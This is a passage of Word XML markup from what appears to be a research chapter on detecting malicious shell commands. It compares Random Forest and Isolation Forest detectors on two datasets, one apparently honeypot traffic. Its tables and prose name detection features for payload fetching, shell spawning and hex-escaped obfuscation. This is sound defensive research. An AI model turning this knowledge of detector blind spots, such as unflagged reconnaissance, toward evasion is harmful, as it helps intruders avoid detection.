              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>57.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>37.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Dataset 2 mean </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>len_chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>52.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>46.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>38.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>On Dataset 1, where length is a positive attack signal (δ +0.247), the missed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>attacks are the short ones and sit essentially on the benign mean. On Dataset 2,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">where the same feature reverses (δ −0.171), the missed attacks are the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>ones. In both cases the model misses whatever falls on the benign side of its</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>own corpus's length prior — the same prior Chapter 5.2 shows does not transfer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The error analysis and the shift analysis are describing one phenomenon from</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>two directions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 2's signature is the same shape with different carriers, and on the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">same rescaled axis its eight span </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>−0.50 to +0.24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_fetch_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (missed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0.035, caught 0.255, benign 0.030 — position 0.02), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_hidden_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (0.01),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (0.01), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (0.10), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (0.24), with</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_hex_escape</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at exactly zero across all 145 misses. Every carrier is a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>delivery marker: the missed honeypot attacks are the ones that do not fetch,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>do not spawn a shell and do not carry an obfuscated payload. They are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>reconnaissance, not delivery — which is consistent with Dataset 2 being live</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Cowrie traffic, where the early-stage probing that never escalates is the bulk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>of what an attacker actually types.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The two models disagree about false alarms, not about attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The interesting question for a cascade is whether the two models are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>complementary. Measured exactly, they are — but not in the direction one would</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>expect.</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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>RF misses also missed by IF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>207 of 207</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>137 of 145</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>attacks IF catches that RF misses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>false positives shared by both</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FP Jaccard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.056</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.011</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>**On Dataset 1, the Random Forest's false negatives are a strict subset of the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Isolation Forest's.** There is not a single attack in the Dataset 1 test split</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that the unsupervised detector catches and the supervised one misses. As a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>source of additional recall, the Isolation Forest contributes exactly nothing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>there — a result worth stating plainly, because the intuition that an anomaly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>detector will "cover a different part of the space" is precisely what the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>measurement refutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Their </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>false positives</w:t>
      </w:r>
      <w:r>
        <w:t>, by contrast, are almost disjoint — 5 shared out of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>90 on Dataset 1, 1 out of 87 on Dataset 2. The two models have essentially</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>uncorrelated notions of which benign command looks suspicious. Reading the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>false alarms by benign source shows the two corpora behave differently:</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Dataset 1 benign source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>RF flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IF flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>linlm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>145</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>12.4%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (18)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7% (1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bash6k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>12.1%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6.0%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>nl2bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7.8% (24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.6% (8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tldr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>935</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.0% (19)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2% (2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bash_instruct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>785</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
